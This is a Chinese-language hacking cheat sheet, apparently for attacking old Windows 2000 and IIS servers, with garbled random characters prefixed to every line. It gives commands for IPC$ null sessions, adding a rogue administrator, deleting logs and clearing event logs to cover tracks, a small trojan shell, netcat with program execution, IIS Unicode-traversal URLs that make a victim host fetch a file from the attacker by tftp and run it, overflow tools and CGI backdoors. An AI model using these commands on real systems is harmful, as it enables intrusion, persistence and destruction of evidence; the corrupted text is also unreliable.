网管和黑客都必须知道的命令
��DQ'yF�PE 常用的几条NET命令:
[v�7)�xV@c ��l�CmT�m (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
S��yH�S�9> <��w@z�iUr (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
:Osw4u]JXd �P�G�Ti-o} (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
{�pEay�|L_ }A@�op+�0E (查看远程主机时间) net time \\IP地址
-[�\+~aDH, DIx!Sw7EC (定时启动某个程序) at \\IP地址 02:18 readme.exe
i"eUacBz/- k+8K[�?�K- (查看共享) net view \\IP地址
6.X�| .��N q/I�':a�[1 (查看netbios工作组列表) nbtstat -A IP地址
:b�y EXe;3 ��#=~n>qn] (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
gmG
M[c�\ =pQ�'wx|>| (这两条把自己增加到管理员组): net user 用户名 密码 /add
BEn,�p��y7 Q
a(�>$.�h net localgroup Administrators 用户名 /add
tqdw
��y.� ]w2n�VC��3 (断开连接) net use \\IP地址\ipc$ /delete
S.,o�m;`� �fQ�Z,��kl 扫尾:
yk1.fxi�k' 4.?tP�7�UE del C:\winnt\system32\logfiles\*.*
�N�7/e��F9 1A>>#M=�A� del C:\winnt\ssytem32\config\*.evt
���F�dT@}� $L��x�fdSa del C:\winnt\system32\dtclog\*.*
yXg #�<H6V ��DI/yH�s� del C:\winnt\system32\*.log
5i 56J�1EC QFn .<��@ del C:\winnt\system32\*.txt
4�~;x(e@�S }b�w�H(OOS del C:\winnt\*.txt
Bismd21F6= �h�_O6Z2J1 del C:\winnt\*.log
�LE����nm6 5v&m�K 5zZ 一、netsvc.exe
Q>���`|�{m 8t���{- 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
6pyLb3�[�e �'`�.bm�iM netsvc /list \\IP地址
�BT?�)-w�S �dEz7 �@T� netsvc schedule \\IP地址 /query
~�0S_S�+e sj@�B0R=Qo netsvc \\IP地址 schedule /start
^zdZ"\���x KHK|Zu#k�' 二、OpenTelnet.exe
\���EP<��r �0(+3w\_! 远程启动主机的Telnet服务,并绑定端口到7878,例如:
Y�h�=/?&*� t�v��h)N{j OpenTelnet \\IP地址 用户名 密码 1 7878
�2(5H��PRQ #d�c�f�Q� 然后就可以telnet到主机的7878端口,进入DOS方式下:
/�uXEh61$8 xW`,�@a��} telnet IP地址 7878
T�nw0�S8M� Xi^�#F;@sU 三、winshell.exe
���v.w�Hj@ ^c���QTRO| 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
�)vO?d~x�| �C_�c*21�X p Path (查看winshell主程序的路径信息)
��4d�fR�}C �Y�g�we�j2 b reBoot (重新启动机器)
:i;�iSrKy e -sZ_<G�H d shutDown (关闭机器)
Wn�p��\yx` i�,77F�!� s Shell (执行后你就会看到可爱的“C:\>”)
hrLPy��V: 9eA2�v{�!S x eXit (退出本次登录会话,此命令并不终止winshell的运行)
U
_Q�Ce+�� I�/F�3�%'O CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
dd�$}�FlT� �Vn�4y^_�H 四、3389登陆器,GUI方式登录远程主机的
F\�Qu�kn� ��y$J�M=f$ 五、elsave.exe
!G��`��7�T c:�%ll&Xtn 事件日志清除工具
}p2Y�RTH�x 8OY��w72&� elsave -s \\IP地址 -l "application" -C
3�B{B6w}t& V(-=�@UW�� elsave -s \\IP地址 -l "system" -C
�@Y�v�+L)� *�3,Kn}ik� elsave -s \\IP地址 -l "security" -C
f��T�:a{�� g\Ck!KJ/�y 执行后成功清除应用程序日志,系统日志,安全日志
-+�#QZ�7b Vh%=JL
s�K 六、hbulot.exe
�:$=r^L�SH � �4�[\[Ho 开启win2kserver和winxp的3389服务
�6k|^Cs6~z +\@��)
1�� hbulot [/r]
m�[k@\xS4e ��D7|�=e�v 使用/r表示安装完成后自动重起目标使设置生效。
@q�szwQav$ U6��4WTS@� 七、nc.exe(netcat.exe)
�Sq�t��'} �85QVj] nr 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
?3X(`:KB�� x<mH�Th:-V 想要连接到某处: nc [-options] hostname port[s] [ports] ...
�1Wz -Z��� Rn"Raq7Cn* 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
���ZS�@�Gt [;rty<Z^b 参数:
nPAVr�Dg
O �SHc<`�M'+ -e prog 程序重定向,一旦连接,就执行 [危险!!]
#osP"�~{
� �)QeXA���) -g gateway source-routing hop point[s], up to 8
~O�gtgr��� �3hN.`G-E� -G num source-routing pointer: 4, 8, 12, ...
^xBF$ua37) 7N�w�}
}�� -h 帮助信息
v>e��%�5[F }ZP;kM$��g -i secs 延时的间隔
`^�mPq?��f �3�b�Cb_Y
-l 监听模式,用于入站连接
PNjZb�OmzS �}"��V$�li -n 指定数字的IP地址,不能用hostname
��J�.�R|Xd =th(H�dk17 -o file 记录16进制的传输
-��A�J�$-y N-lo[bDJ�h -p port 本地端口号
dKKh�^D`�~ ��Z9TUaMhF -r 任意指定本地及远程端口
.M�n+�Bd4f eM3-S=R?<g -s addr 本地源地址
I04�GQql 4| �6�<nk_ -u UDP模式
}D/O cp~o� �UJ}Xa&*H\ -v 详细输出——用两个-v可得到更详细的内容
ZQ&A�'(tt4 @x�O?SjH� -w secs timeout的时间
G`a,(<�kT; �9;f�yC�=� -z 将输入输出关掉——用于扫描时
@L��p;p$G` 八、TFTPD32.EXE
?0�ezr[`�. :^�G;`T`L� 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
|^�uU�&O;. x�]��1G� u http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
K`BNSdEN�> #_��A <C+[ 然后可以直接令文件运行:
�$r>�\y (W lphELPh�� http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
��\0{g~cU4 2�
/��rDi� 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
$p(,Qz(.8� FuA8�vTV�{ 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
�NXJyRAJ*% �G>�3]A5�� 一、一 Xscan命令行运行参数说明:
�p1-b�q�:� @[:J��Q'R= 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
u{H'e�vv0O =�p1aF/1$I 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
��st�b)Tl^ �-{��a��e� xscan -file <主机列表文件名> <检测项目> [其他选项]
�
�1#G��( w�2�
L'�j9 其中<检测项目> 含义如下:
ftL�>oO�z[ i�?*_-NA�m -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
I�6k �S1�� ��[f_4%Now -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
�rh8.kW-K_ B��i!�j re -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
s�S�h=Idrx �B@:1�1,.7 -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
�[RZ}�9�`V ^��KBE2�C� -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
UL46%MFQ\ ��kLr6j-X� [其他选项] 含义如下:
Q�%seV<!/� nJdO~0�}3� -v: 显示详细扫描进度
gypE~�@��� 4�f}:)M$5 -p: 跳过Ping不通的主机
d )}@�0Q� *=6,}rX�"I -o: 跳过没有检测到开放端口的主机
�\z/_v�zz4 34@f(^d+^ -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
